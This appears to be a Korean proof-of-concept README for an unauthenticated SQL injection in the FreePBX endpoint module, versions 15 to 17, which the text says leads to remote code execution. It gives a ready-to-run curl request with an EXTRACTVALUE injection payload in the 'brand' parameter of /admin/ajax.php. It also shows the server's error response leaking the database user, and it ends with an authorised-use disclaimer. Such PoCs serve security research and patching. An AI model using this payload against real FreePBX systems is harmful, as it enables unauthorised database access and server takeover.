
FreePBX 버전 15, 16, 17에는 엔드포인트에서 사용자 제공 데이터의 불충분한 정제로 인한 원격 코드 실행(RCE) 취약점이 존재합니다.
FreePBX 버전 15, 16, 17은 엔드포인트에서 사용자 제공 데이터의 불충분한 검사로 인한 원격 코드 실행(RCE) 취약점을 포함합니다.
인증되지 않은 공격자는 데이터베이스를 조작하여 원격 코드 실행을 달성할 수 있습니다. 익스플로잇은 인증이 필요하지 않습니다.
참고: 대상이 편집되었습니다. 승인된 테스트를 수행할 때
[REDACTED_TARGET]을 실제 호스트로 바꾸십시오.
curl -i -k "https://[REDACTED_TARGET]/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',(SELECT+USER()),'~'))+--+"
HTTP/1.1 500 Internal Server Error
Date: Fri, 12 Sep 2025 08:35:29 GMT
Server: Apache/2.4.6 (Sangoma) OpenSSL/1.0.1e-fips PHP/5.6.31
X-Powered-By: PHP/5.6.31
Set-Cookie: PHPSESSID=fmt7o0oecththmves36nijvfu7; expires=Sun, 12-Oct-2025 08:35:29 GMT; Max-Age=2592000; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json
{"error":{"type":"Exception","message":"SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~USER:freepbxuser@localhost~'::","file":"\/var\/www\/html\/admin\/libraries\/utility.functions.php","line":207}}
이것이 증명하는 것: 응답에 ~USER:freepbxuser@localhost~가 포함됨 — 인증되지 않은 요청에서 SQL 인젝션/데이터 노출 확인.

인증되지 않은 원격 데이터베이스 조작으로 서버에서 임의 코드 실행 가능 — 전체 시스템 장악 가능.
이 저장소와 PoC는 교육 및 승인된 보안 연구 목적으로만 제공됩니다. 명시적 허가 없이 시스템을 테스트하거나 악용하지 마십시오. 저자는 이 PoC의 오용이나 손해에 대해 책임을 지지 않습니다.